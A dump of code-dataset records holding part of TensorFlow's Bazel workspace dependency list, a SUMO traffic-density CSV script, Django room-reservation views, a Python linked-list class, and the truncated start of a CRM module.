tf_mirror_urls(\"https://github.com/nvidia/nccl/archive/v2.18.5-1.tar.gz\"),\n )\n\n java_import_external(\n name = \"junit\",\n jar_sha256 = \"59721f0805e223d84b90677887d9ff567dc534d7c502ca903c0c2b17f05c116a\",\n jar_urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/repo1.maven.org/maven2/junit/junit/4.12/junit-4.12.jar\",\n \"https://repo1.maven.org/maven2/junit/junit/4.12/junit-4.12.jar\",\n \"https://maven.ibiblio.org/maven2/junit/junit/4.12/junit-4.12.jar\",\n ],\n licenses = [\"reciprocal\"], # Common Public License Version 1.0\n testonly_ = True,\n deps = [\"@org_hamcrest_core\"],\n )\n\n java_import_external(\n name = \"org_hamcrest_core\",\n jar_sha256 = \"66fdef91e9739348df7a096aa384a5685f4e875584cce89386a7a47251c4d8e9\",\n jar_urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/repo1.maven.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar\",\n \"https://repo1.maven.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar\",\n \"https://maven.ibiblio.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar\",\n ],\n licenses = [\"notice\"], # New BSD License\n testonly_ = True,\n )\n\n java_import_external(\n name = \"com_google_testing_compile\",\n jar_sha256 = \"edc180fdcd9f740240da1a7a45673f46f59c5578d8cd3fbc912161f74b5aebb8\",\n jar_urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/repo1.maven.org/maven2/com/google/testing/compile/compile-testing/0.11/compile-testing-0.11.jar\",\n \"https://repo1.maven.org/maven2/com/google/testing/compile/compile-testing/0.11/compile-testing-0.11.jar\",\n ],\n licenses = [\"notice\"], # New BSD License\n testonly_ = True,\n deps = [\"@com_google_guava\", \"@com_google_truth\"],\n )\n\n java_import_external(\n name = \"com_google_truth\",\n jar_sha256 = \"032eddc69652b0a1f8d458f999b4a9534965c646b8b5de0eba48ee69407051df\",\n jar_urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/repo1.maven.org/maven2/com/google/truth/truth/0.32/truth-0.32.jar\",\n \"https://repo1.maven.org/maven2/com/google/truth/truth/0.32/truth-0.32.jar\",\n ],\n licenses = [\"notice\"], # Apache 2.0\n testonly_ = True,\n deps = [\"@com_google_guava\"],\n )\n\n java_import_external(\n name = \"org_checkerframework_qual\",\n jar_sha256 = \"d261fde25d590f6b69db7721d469ac1b0a19a17ccaaaa751c31f0d8b8260b894\",\n jar_urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/repo1.maven.org/maven2/org/checkerframework/checker-qual/2.10.0/checker-qual-2.10.0.jar\",\n \"https://repo1.maven.org/maven2/org/checkerframework/checker-qual/2.10.0/checker-qual-2.10.0.jar\",\n ],\n licenses = [\"notice\"], # Apache 2.0\n )\n\n java_import_external(\n name = \"com_squareup_javapoet\",\n jar_sha256 = \"5bb5abdfe4366c15c0da3332c57d484e238bd48260d6f9d6acf2b08fdde1efea\",\n jar_urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/repo1.maven.org/maven2/com/squareup/javapoet/1.9.0/javapoet-1.9.0.jar\",\n \"https://repo1.maven.org/maven2/com/squareup/javapoet/1.9.0/javapoet-1.9.0.jar\",\n ],\n licenses = [\"notice\"], # Apache 2.0\n )\n\n tf_http_archive(\n name = \"com_google_pprof\",\n build_file = \"//third_party:pprof.BUILD\",\n sha256 = \"b844b75c25cfe7ea34b832b369ab91234009b2dfe2ae1fcea53860c57253fe2e\",\n strip_prefix = \"pprof-83db2b799d1f74c40857232cb5eb4c60379fe6c2\",\n urls = tf_mirror_urls(\"https://github.com/google/pprof/archive/83db2b799d1f74c40857232cb5eb4c60379fe6c2.tar.gz\"),\n )\n\n # The CUDA 11 toolkit ships with CUB. We should be able to delete this rule\n # once TF drops support for CUDA 10.\n tf_http_archive(\n name = \"cub_archive\",\n build_file = \"//third_party:cub.BUILD\",\n sha256 = \"162514b3cc264ac89d91898b58450190b8192e2af1142cf8ccac2d59aa160dda\",\n strip_prefix = \"cub-1.9.9\",\n urls = tf_mirror_urls(\"https://github.com/NVlabs/cub/archive/1.9.9.zip\"),\n )\n\n tf_http_archive(\n name = \"nvtx_archive\",\n build_file = \"//third_party:nvtx.BUILD\",\n sha256 = \"bb8d1536aad708ec807bc675e12e5838c2f84481dec4005cd7a9bbd49e326ba1\",\n strip_prefix = \"NVTX-3.0.1/c/include\",\n urls = tf_mirror_urls(\"https://github.com/NVIDIA/NVTX/archive/v3.0.1.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"cython\",\n build_file = \"//third_party:cython.BUILD\",\n sha256 = \"0c2eae8a4ceab7955be1e11a4ddc5dcc3aa06ce22ad594262f1555b9d10667f0\",\n strip_prefix = \"cython-3.0.3\",\n system_build_file = \"//third_party/systemlibs:cython.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/cython/cython/archive/3.0.3.tar.gz\"),\n )\n\n # LINT.IfChange\n tf_http_archive(\n name = \"arm_neon_2_x86_sse\",\n build_file = \"//third_party:arm_neon_2_x86_sse.BUILD\",\n sha256 = \"019fbc7ec25860070a1d90e12686fc160cfb33e22aa063c80f52b363f1361e9d\",\n strip_prefix = \"ARM_NEON_2_x86_SSE-a15b489e1222b2087007546b4912e21293ea86ff\",\n urls = tf_mirror_urls(\"https://github.com/intel/ARM_NEON_2_x86_SSE/archive/a15b489e1222b2087007546b4912e21293ea86ff.tar.gz\"),\n )\n # LINT.ThenChange(//tensorflow/lite/tools/cmake/modules/neon2sse.cmake)\n\n tf_http_archive(\n name = \"double_conversion\",\n sha256 = \"3dbcdf186ad092a8b71228a5962009b5c96abde9a315257a3452eb988414ea3b\",\n strip_prefix = \"double-conversion-3.2.0\",\n system_build_file = \"//third_party/systemlibs:double_conversion.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/google/double-conversion/archive/v3.2.0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"tflite_mobilenet_float\",\n build_file = \"//third_party:tflite_mobilenet_float.BUILD\",\n sha256 = \"2fadeabb9968ec6833bee903900dda6e61b3947200535874ce2fe42a8493abc0\",\n urls = [\n \"https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_2018_08_02/mobilenet_v1_1.0_224.tgz\",\n \"https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_2018_08_02/mobilenet_v1_1.0_224.tgz\",\n ],\n )\n\n tf_http_archive(\n name = \"tflite_mobilenet_quant\",\n build_file = \"//third_party:tflite_mobilenet_quant.BUILD\",\n sha256 = \"d32432d28673a936b2d6281ab0600c71cf7226dfe4cdcef3012555f691744166\",\n urls = [\n \"https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_2018_08_02/mobilenet_v1_1.0_224_quant.tgz\",\n \"https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_2018_08_02/mobilenet_v1_1.0_224_quant.tgz\",\n ],\n )\n\n tf_http_archive(\n name = \"tflite_mobilenet_ssd\",\n build_file = str(Label(\"//third_party:tflite_mobilenet.BUILD\")),\n sha256 = \"767057f2837a46d97882734b03428e8dd640b93236052b312b2f0e45613c1cf0\",\n urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/storage.googleapis.com/download.tensorflow.org/models/tflite/mobilenet_ssd_tflite_v1.zip\",\n \"https://storage.googleapis.com/download.tensorflow.org/models/tflite/mobilenet_ssd_tflite_v1.zip\",\n ],\n )\n\n tf_http_archive(\n name = \"tflite_mobilenet_ssd_quant\",\n build_file = str(Label(\"//third_party:tflite_mobilenet.BUILD\")),\n sha256 = \"a809cd290b4d6a2e8a9d5dad076e0bd695b8091974e0eed1052b480b2f21b6dc\",\n urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/storage.googleapis.com/download.tensorflow.org/models/tflite/coco_ssd_mobilenet_v1_0.75_quant_2018_06_29.zip\",\n \"https://storage.googleapis.com/download.tensorflow.org/models/tflite/coco_ssd_mobilenet_v1_0.75_quant_2018_06_29.zip\",\n ],\n )\n\n tf_http_archive(\n name = \"tflite_mobilenet_ssd_quant_protobuf\",\n build_file = str(Label(\"//third_party:tflite_mobilenet.BUILD\")),\n sha256 = \"09280972c5777f1aa775ef67cb4ac5d5ed21970acd8535aeca62450ef14f0d79\",\n strip_prefix = \"ssd_mobilenet_v1_quantized_300x300_coco14_sync_2018_07_18\",\n urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/storage.googleapis.com/download.tensorflow.org/models/object_detection/ssd_mobilenet_v1_quantized_300x300_coco14_sync_2018_07_18.tar.gz\",\n \"https://storage.googleapis.com/download.tensorflow.org/models/object_detection/ssd_mobilenet_v1_quantized_300x300_coco14_sync_2018_07_18.tar.gz\",\n ],\n )\n\n tf_http_archive(\n name = \"tflite_conv_actions_frozen\",\n build_file = str(Label(\"//third_party:tflite_mobilenet.BUILD\")),\n sha256 = \"d947b38cba389b5e2d0bfc3ea6cc49c784e187b41a071387b3742d1acac7691e\",\n urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/storage.googleapis.com/download.tensorflow.org/models/tflite/conv_actions_tflite.zip\",\n \"https://storage.googleapis.com/download.tensorflow.org/models/tflite/conv_actions_tflite.zip\",\n ],\n )\n\n tf_http_archive(\n name = \"tflite_ovic_testdata\",\n build_file = \"//third_party:tflite_ovic_testdata.BUILD\",\n sha256 = \"033c941b7829b05ca55a124a26a6a0581b1ececc154a2153cafcfdb54f80dca2\",\n strip_prefix = \"ovic\",\n urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/storage.googleapis.com/download.tensorflow.org/data/ovic_2019_04_30.zip\",\n \"https://storage.googleapis.com/download.tensorflow.org/data/ovic_2019_04_30.zip\",\n ],\n )\n\n tf_http_archive(\n name = \"build_bazel_rules_android\",\n sha256 = \"cd06d15dd8bb59926e4d65f9003bfc20f9da4b2519985c27e190cddc8b7a7806\",\n strip_prefix = \"rules_android-0.1.1\",\n urls = tf_mirror_urls(\"https://github.com/bazelbuild/rules_android/archive/v0.1.1.zip\"),\n )\n\n tf_http_archive(\n name = \"rules_android_ndk\",\n sha256 = \"b29409496439cdcdb50a8e161c4953ca78a548e16d3ee729a1b5cd719ffdacbf\",\n strip_prefix = \"rules_android_ndk-81ec8b79dc50ee97e336a25724fdbb28e33b8d41\",\n urls = tf_mirror_urls(\"https://github.com/bazelbuild/rules_android_ndk/archive/81ec8b79dc50ee97e336a25724fdbb28e33b8d41.zip\"),\n )\n\n # Apple and Swift rules.\n # https://github.com/bazelbuild/rules_apple/releases\n tf_http_archive(\n name = \"build_bazel_rules_apple\",\n sha256 = \"a6141240657093fa7ccc7ca1ee5a62408dd9996d1bf47bc2369b8b9faefb2698\",\n urls = tf_mirror_urls(\"https://github.com/bazelbuild/rules_apple/releases/download/2.3.0/rules_apple.2.3.0.tar.gz\"),\n )\n\n # https://github.com/bazelbuild/rules_swift/releases\n tf_http_archive(\n name = \"build_bazel_rules_swift\",\n sha256 = \"32f95dbe6a88eb298aaa790f05065434f32a662c65ec0a6aabdaf6881e4f169f\",\n urls = tf_mirror_urls(\"https://github.com/bazelbuild/rules_swift/releases/download/1.5.0/rules_swift.1.5.0.tar.gz\"),\n )\n\n # https://github.com/bazelbuild/apple_support/releases\n tf_http_archive(\n name = \"build_bazel_apple_support\",\n sha256 = \"9f7bb62c3ae889e0eae8c18458fd8764e2e537687d9a1d85885d6af980e4fc31\",\n urls = tf_mirror_urls(\"https://github.com/bazelbuild/apple_support/releases/download/1.6.0/apple_support.1.6.0.tar.gz\"),\n )\n\n # https://github.com/apple/swift-protobuf/releases\n tf_http_archive(\n name = \"com_github_apple_swift_swift_protobuf\",\n strip_prefix = \"swift-protobuf-1.19.0/\",\n sha256 = \"f057930b9dbd17abeaaceaa45e9f8b3e87188c05211710563d2311b9edf490aa\",\n urls = tf_mirror_urls(\"https://github.com/apple/swift-protobuf/archive/1.19.0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"xctestrunner\",\n strip_prefix = \"xctestrunner-4c5709da9444eae6bba2425734b8654635bed0a6\",\n sha256 = \"e5d4c53c3965ae943fb08ccd7df0efd75590213fce5052388f23fad81a649f5a\",\n urls = tf_mirror_urls(\"https://github.com/google/xctestrunner/archive/4c5709da9444eae6bba2425734b8654635bed0a6.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"nlohmann_json_lib\",\n build_file = \"//third_party:nlohmann_json.BUILD\",\n sha256 = \"5daca6ca216495edf89d167f808d1d03c4a4d929cef7da5e10f135ae1540c7e4\",\n strip_prefix = \"json-3.10.5\",\n urls = tf_mirror_urls(\"https://github.com/nlohmann/json/archive/v3.10.5.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"pybind11\",\n urls = tf_mirror_urls(\"https://github.com/pybind/pybind11/archive/v2.10.4.tar.gz\"),\n sha256 = \"832e2f309c57da9c1e6d4542dedd34b24e4192ecb4d62f6f4866a737454c9970\",\n strip_prefix = \"pybind11-2.10.4\",\n build_file = \"//third_party:pybind11.BUILD\",\n system_build_file = \"//third_party/systemlibs:pybind11.BUILD\",\n )\n\n tf_http_archive(\n name = \"pybind11_protobuf\",\n urls = tf_mirror_urls(\"https://github.com/pybind/pybind11_protobuf/archive/80f3440cd8fee124e077e2e47a8a17b78b451363.zip\"),\n sha256 = \"c7ab64b1ccf9a678694a89035a8c865a693e4e872803778f91f0965c2f281d78\",\n strip_prefix = \"pybind11_protobuf-80f3440cd8fee124e077e2e47a8a17b78b451363\",\n patch_file = [\"//third_party/pybind11_protobuf:remove_license.patch\"],\n )\n\n tf_http_archive(\n name = \"coremltools\",\n sha256 = \"89bb0bd2c16e19932670838dd5a8b239cd5c0a42338c72239d2446168c467a08\",\n strip_prefix = \"coremltools-5.2\",\n build_file = \"//third_party:coremltools.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/apple/coremltools/archive/5.2.tar.gz\"),\n )\n\n # Dependencies required by grpc\n # - pin rules_go to a newer version so it's compatible with Bazel 6.0\n # - patch upb so that it's compatible with Bazel 6.0, the latest version of upb doesn't work with the old grpc version.\n tf_http_archive(\n name = \"io_bazel_rules_go\",\n sha256 = \"16e9fca53ed6bd4ff4ad76facc9b7b651a89db1689a2877d6fd7b82aa824e366\",\n urls = tf_mirror_urls(\"https://github.com/bazelbuild/rules_go/releases/download/v0.34.0/rules_go-v0.34.0.zip\"),\n )\n\n tf_http_archive(\n name = \"upb\",\n sha256 = \"61d0417abd60e65ed589c9deee7c124fe76a4106831f6ad39464e1525cef1454\",\n strip_prefix = \"upb-9effcbcb27f0a665f9f345030188c0b291e32482\",\n patch_file = [\"//third_party/grpc:upb_platform_fix.patch\"],\n urls = tf_mirror_urls(\"https://github.com/protocolbuffers/upb/archive/9effcbcb27f0a665f9f345030188c0b291e32482.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_github_glog_glog\",\n sha256 = \"f28359aeba12f30d73d9e4711ef356dc842886968112162bc73002645139c39c\",\n strip_prefix = \"glog-0.4.0\",\n urls = tf_mirror_urls(\"https://github.com/google/glog/archive/refs/tags/v0.4.0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_google_ortools\",\n sha256 = \"bc4b07dc9c23f0cca43b1f5c889f08a59c8f2515836b03d4cc7e0f8f2c879234\",\n strip_prefix = \"or-tools-9.6\",\n patch_file = [\"//third_party/ortools:ortools.patch\"],\n urls = tf_mirror_urls(\"https://github.com/google/or-tools/archive/v9.6.tar.gz\"),\n repo_mapping = {\n \"@com_google_protobuf_cc\": \"@com_google_protobuf\",\n \"@eigen\": \"@eigen_archive\",\n },\n )\n\n tf_http_archive(\n name = \"glpk\",\n sha256 = \"9a5dab356268b4f177c33e00ddf8164496dc2434e83bd1114147024df983a3bb\",\n build_file = \"//third_party/ortools:glpk.BUILD\",\n urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/ftp.gnu.org/gnu/glpk/glpk-4.52.tar.gz\",\n \"http://ftp.gnu.org/gnu/glpk/glpk-4.52.tar.gz\",\n ],\n )\n\n tf_http_archive(\n name = \"scip\",\n sha256 = \"fe7636f8165a8c9298ff55ed3220d084d4ea31ba9b69d2733beec53e0e4335d6\",\n strip_prefix = \"scip-803\",\n build_file = \"//third_party/ortools:scip.BUILD\",\n patch_file = [\"//third_party/ortools:scip.patch\"],\n urls = tf_mirror_urls(\"https://github.com/scipopt/scip/archive/refs/tags/v803.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"bliss\",\n build_file = \"//third_party/ortools:bliss.BUILD\",\n sha256 = \"f57bf32804140cad58b1240b804e0dbd68f7e6bf67eba8e0c0fa3a62fd7f0f84\",\n urls = tf_mirror_urls(\"https://github.com/google/or-tools/releases/download/v9.0/bliss-0.73.zip\"),\n #url = \"http://www.tcs.hut.fi/Software/bliss/bliss-0.73.zip\",\n )\n\n # Riegeli is imported twice since there are two targets (third_party/riegeli and\n # third_party/py/riegeli) that are used in TF.\n tf_http_archive(\n name = \"riegeli\",\n sha256 = \"870ca080cdfc5eba696a72ccc3a54cbf0f2271befc0d459eafa8f065edfaadb2\",\n strip_prefix = \"riegeli-264ef7b4a1314d97265b37544b27cd3923ea72d2\",\n urls = tf_mirror_urls(\"https://github.com/google/riegeli/archive/264ef7b4a1314d97265b37544b27cd3923ea72d2.zip\"),\n )\n\n tf_http_archive(\n name = \"riegeli_py\",\n sha256 = \"870ca080cdfc5eba696a72ccc3a54cbf0f2271befc0d459eafa8f065edfaadb2\",\n patch_file = [\"//third_party:riegeli_fix.patch\"],\n strip_prefix = \"riegeli-264ef7b4a1314d97265b37544b27cd3923ea72d2\",\n urls = tf_mirror_urls(\"https://github.com/google/riegeli/archive/264ef7b4a1314d97265b37544b27cd3923ea72d2.zip\"),\n )\n\n # Required by riegeli.\n tf_http_archive(\n name = \"org_brotli\",\n sha256 = \"84a9a68ada813a59db94d83ea10c54155f1d34399baf377842ff3ab9b3b3256e\",\n strip_prefix = \"brotli-3914999fcc1fda92e750ef9190aa6db9bf7bdb07\",\n urls = tf_mirror_urls(\"https://github.com/google/brotli/archive/3914999fcc1fda92e750ef9190aa6db9bf7bdb07.zip\"), # 2022-11-17\n )\n\n # Required by riegeli.\n tf_http_archive(\n name = \"net_zstd\",\n build_file = \"//third_party:net_zstd.BUILD\",\n sha256 = \"b6c537b53356a3af3ca3e621457751fa9a6ba96daf3aebb3526ae0f610863532\",\n strip_prefix = \"zstd-1.4.5/lib\",\n urls = tf_mirror_urls(\"https://github.com/facebook/zstd/archive/v1.4.5.zip\"), # 2020-05-22\n )\n\n tf_http_archive(\n name = \"com_google_highway\",\n sha256 = \"2eb48f87c099a95123dc13a9f243bd3b74d67fe1d887942903d09a211593da97\",\n strip_prefix = \"highway-1.0.7\",\n urls = tf_mirror_urls(\"https://github.com/google/highway/archive/refs/tags/1.0.7.zip\"),\n )\n\n # used for adding androidx.annotation dependencies in tflite android jni.\n maven_install(\n artifacts = [\n \"androidx.annotation:annotation:aar:1.1.0\",\n ],\n repositories = [\n \"https://jcenter.bintray.com\",\n \"https://maven.google.com\",\n \"https://dl.google.com/dl/android/maven2\",\n \"https://repo1.maven.org/maven2\",\n ],\n fetch_sources = True,\n version_conflict_policy = \"pinned\",\n )\n\ndef workspace():\n # Check the bazel version before executing any repository rules, in case\n # those rules rely on the version we require here.\n versions.check(\"1.0.0\")\n\n # Initialize toolchains and platforms.\n _tf_toolchains()\n\n # Import third party repositories according to go/tfbr-thirdparty.\n _initialize_third_party()\n\n # Import all other repositories. This should happen before initializing\n # any external repositories, because those come with their own\n # dependencies. Those recursive dependencies will only be imported if they\n # don't already exist (at least if the external repository macros were\n # written according to common practice to query native.existing_rule()).\n _tf_repositories()\n\n tfrt_dependencies()\n\n# Alias so it can be loaded without assigning to a different symbol to prevent\n# shadowing previous loads and trigger a buildifier warning.\ntf_workspace2 = workspace\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/workspace2.bzl","file_name":"workspace2.bzl","file_ext":"bzl","file_size_in_byte":44365,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"35861331850","text":"import csv\r\n\r\n\r\n# Open the input CSV file and the output CSV file\r\nwith open(r'D:\\\\ITS-2023\\\\Scenario\\\\fcd_export.csv', 'r') as f_in:\r\n # Create CSV reader and writer objects\r\n reader = csv.DictReader(f_in)\r\n s = set()\r\n \r\n total_time = 1160 #always change its value to final time\r\n updated_total_time = total_time - 60\r\n tme = (updated_total_time // 5) + 2\r\n # tme = (updated_total_time // 10) + 2\r\n l = [0] * int(tme)\r\n m = [[] for _ in range(tme)]\r\n vehicle_ids= [[] for _ in range(tme)]\r\n init_time = 0\r\n end_time = 60\r\n Velocity = []\r\n total_size = tme\r\n ranges = []\r\n increment = 60\r\n start = 0\r\n\r\n for _ in range(total_size):\r\n end = start + increment\r\n ranges.append((start, end))\r\n start += 5\r\n # start += 10\r\n\r\n num_vehicles=[]\r\n\r\n # and int(row['vehicle_id']) > 453\r\n for row in reader:\r\n # while float(row['vehicle_insertion_time']) < end_time:\r\n # print(row)\r\n if float(row['pos']) > 0 and float(row['pos'] )<= 400 and (row['lane']=='E0_0' or row['lane']=='E0_1'):\r\n for start, end in ranges:\r\n if start < (float(row['time'])) < end:\r\n l[start // 5] += 1\r\n m[start // 5].append(float(row['speed']))\r\n vehicle_ids[start // 5].append(int(row['vehicle_id']))\r\n # vehicle_ids_car[start // 5].append(int(row['vehicle_id']))\r\n\r\n # l[start // 10] += 1\r\n # m[start // 10].append(float(row['speed']))\r\n # vehicle_ids[start // 10].append(int(row['vehicle_id']))\r\n\r\n # s.add(float(row['vehicle_id']))\r\n # num_vehicles.append(len(s))\r\n # writer = csv.writer(f_out)\r\n # writer.writerow(['#Minutes', '#Vehicles'])\r\n # for i, d in enumerate(l):\r\n # writer.writerow([i+1, d])\r\n # print(l)\r\n\r\n non_empty_m = [lst for lst in m if lst]\r\n sum = 0\r\n for i in non_empty_m:\r\n for j in i:\r\n sum += j\r\n Velocity.append(sum / len(i))\r\n sum = 0\r\n\r\n \r\n for i in vehicle_ids:\r\n s=set()\r\n for j in i:\r\n s.add(j)\r\n num_vehicles.append(len(s))\r\n non_zero_num_vehicles = [num for num in num_vehicles if num != 0]\r\n # print(len(non_zero_num_vehicles))\r\n # print(len(Velocity))\r\n ranges = ranges[0:]\r\n # print(len(ranges))\r\n rows = zip(ranges, non_zero_num_vehicles, Velocity)\r\n\r\n with open('E_Veh_Density_and_Velocity_Total-5.csv', 'w', newline='') as f_out:\r\n writer = csv.writer(f_out)\r\n writer.writerow(['Interval', 'Vehicles', 'Speed']) # Write header row\r\n writer.writerows(rows)","repo_name":"MayankSingh-git/SUMO-Python-Code","sub_path":"5. E_veh_density_and_speed_window.py","file_name":"5. E_veh_density_and_speed_window.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"70018741479","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom room_res.models import Room, RoomReservation\nimport datetime\n\ndef index(request):\n return render(request, 'base.html')\n\nclass AddRoomView(View):\n def get(self, request):\n return render(request, \"add_room.html\")\n\n def post(self, request):\n name = request.POST.get(\"name\")\n capacity = request.POST.get(\"capacity\")\n capacity = int(capacity) if capacity else 0\n projector = request.POST.get(\"projector\") == \"on\"\n\n if not name:\n return render(request, \"add_room.html\", context={\"error\": \"Enter correct Room name\"})\n if capacity <= 0:\n return render(request, \"add_room.html\", context={\"error\": \"Capacity must be more than zero\"})\n if Room.objects.filter(name=name).first():\n return render(request, \"add_room.html\", context={\"error\": \"This Room already exist\"})\n\n Room.objects.create(name=name, capacity=capacity, projector_availability=projector)\n return redirect(\"/rooms/\")\n\n\nclass RoomListView(View):\n def get(self, request):\n rooms = Room.objects.all()\n context = {'rooms':rooms}\n for room in rooms:\n reservation_dates = [reservation.date for reservation in room.roomreservation_set.all()]\n room.reserved = datetime.date.today() in reservation_dates\n return render(request, 'rooms.html', context)\n\n\ndef room_delete(request, id):\n if request.method == \"GET\":\n return render(request, 'delete_room.html', {'rooms':Room.objects.get(pk=id)})\n else:\n if request.POST['submit'] == 'Yes':\n room = Room.objects.get(pk=id)\n room.delete()\n return redirect(\"/rooms/\")\n\n\ndef room_modify(request, id):\n if request.method == 'GET':\n context = {'room':Room.objects.get(pk=id)}\n return render(request, \"modify_room.html\", context)\n else:\n room = Room.objects.get(id=id)\n name = request.POST.get(\"name\")\n capacity = request.POST.get(\"capacity\")\n capacity = int(capacity) if capacity else 0\n projector = request.POST.get(\"projector\") == \"on\"\n if not name:\n return render(request, \"modify_room.html\", context={\"room\": room, \"error\": \"Enter new name\"})\n if capacity <= 0:\n return render(request, \"modify_room.html\", context={\"room\": room, \"error\": \"Enter correct capacity\"})\n if name != room.name and Room.objects.filter(name=name).first():\n return render(request, \"modify_room.html\", context={\"room\": room, \"error\": \"This Room already exist\"})\n room.name = name\n room.capacity = capacity\n room.projector_availability = projector\n room.save()\n return redirect(\"/rooms/\")\n\n\n\nclass ReservationView(View):\n def get(self, request, id):\n return render(request, 'reservation.html', {'room':Room.objects.get(id=id)})\n def post(self, request, id):\n room_id = Room.objects.get(pk=id)\n date = request.POST.get('reservation_date')\n comment = request.POST.get('comment')\n reservations = room_id.roomreservation_set.filter(date__gte=str(datetime.date.today())).order_by('date')\n if RoomReservation.objects.filter(room_id=room_id, date=date):\n return render(request, 'reservation.html', context={'room':room_id, \"error\":\"Room is already booked this day\"})\n if date < str(datetime.date.today()):\n return render(request, 'reservation.html', context={\"room\":room_id, \"error\":\"Can't book in past!\"})\n RoomReservation.objects.create(room_id=room_id, date=date, comment=comment)\n return redirect(\"/rooms/\")\n\nclass RoomDetailsView(View):\n def get(self, request, id):\n room = Room.objects.get(id=id)\n reservations = room.roomreservation_set.filter(date__gte=str(datetime.date.today())).order_by('date')\n return render(request, \"room_details.html\", context={\"room\": room, \"reservations\": reservations})\n\n\nclass SearchView(View):\n def get(self, request):\n name = request.GET.get(\"name\")\n capacity = request.GET.get(\"capacity\")\n capacity = int(capacity) if capacity else 0\n projector = request.GET.get(\"projector\") == \"on\"\n\n rooms = Room.objects.all()\n if projector:\n rooms = rooms.filter(projector_availability=projector)\n if capacity:\n rooms = rooms.filter(capacity__gte=capacity)\n if name:\n rooms = rooms.filter(name__icontains=name)\n\n for room in rooms:\n reservation_dates = [reservation.date for reservation in room.roomreservation_set.all()]\n room.reserved = str(datetime.date.today()) in reservation_dates\n\n return render(request, \"rooms.html\", context={\"rooms\": rooms, \"date\": datetime.date.today()})\n","repo_name":"dymekmichal/first_room_reservation","sub_path":"room_res/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6736459845","text":"class Node:\n\tdef __init__(self, val, next):\n\t\tself.next = next\n\t\tself.val = val\n\n\tdef get_next(self):\n\t\treturn self.next\n\n\tdef get_val(self):\n\t\treturn self.val\n\n\tdef set_next(self, node):\n\t\tif node:\n\t\t\tassert isinstance(node, Node)\n\t\tself.next = node\n\nclass LinkList:\n\tdef __init__(self, init_list = []):\n\t\tself.node = None\n\t\tpre_node = None\n\t\tfor e in init_list:\n\t\t\tnode = Node(e, None)\n\t\t\tif pre_node:\n\t\t\t\tpre_node.set_next(node)\n\t\t\telse:\n\t\t\t\tself.node = node\n\t\t\tpre_node = node\n\n\tdef _get(self, n):\n\t\tnode = self.node\n\t\tfor i in range(0, n + 1):\n\t\t\tif node:\n\t\t\t\tif i == n:\n\t\t\t\t\treturn node\n\t\t\t\telse:\n\t\t\t\t\tnode = node.get_next()\n\t\t\telse:\n\t\t\t\traise Exception(\"index %d out of link list range\"%(n))\n\n\tdef get(self, n):\n\t\treturn self._get(n).get_val()\n\n\tdef _check_next(self, node, n):\n\t\tif node and node.get_next():\n\t\t\tpass\n\t\telse:\n\t\t\traise Exception(\"index %d out of link list range\"%(n))\n\n\tdef delete(self, n):\n\t\tif n == 0:\n\t\t\tif self.node and self.node.get_next():\n\t\t\t\tself.node = self.node.get_next()\n\t\t\telse:\n\t\t\t\tself.node = None\n\t\telse:\n\t\t\tpre_node = self._get(n - 1)\n\t\t\tself._check_next(pre_node, n)\n\t\t\tpre_node.set_next(pre_node.get_next().get_next())\n\n\tdef to_list(self):\n\t\tres = []\n\t\tnode = self.node\n\t\twhile node:\n\t\t\tres.append(node.get_val())\n\t\t\tnode = node.get_next()\n\t\treturn res\n\n\tdef append(self, val):\n\t\tnode = self.node\n\t\tif node:\n\t\t\twhile(node.get_next()):\n\t\t\t\tnode = node.get_next()\n\t\t\tnode.set_next(Node(val, None))\n\t\telse:\n\t\t\tself.node = Node(val, None)\n\n\tdef is_empty(self):\n\t\treturn True if not self.node else False\n\n\tdef dump(self):\n\t\tcurr = self.node\n\t\tres = []\n\t\twhile curr:\n\t\t\tres.append(curr.get_val())\n\t\t\tcurr = curr.get_next()\n\t\telse:\n\t\t\treturn res\n","repo_name":"tzwenn/pyrlang","sub_path":"utils/link_list.py","file_name":"link_list.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73027162920","text":"import json\nfrom flask import jsonify\nimport requests\nfrom requests.api import request\nfrom crm.pipelinedeals.entities.pipelinedeals_company import PipelinedealsCompany\nfrom crm.pipelinedeals.entities.pipelinedeals_deal import PipelinedealsDeal\nfrom crm.pipelinedeals.entities.pipelinedeals_person import PipelinedealsPerson\nfrom crm.pipelinedeals import util\n\nclass 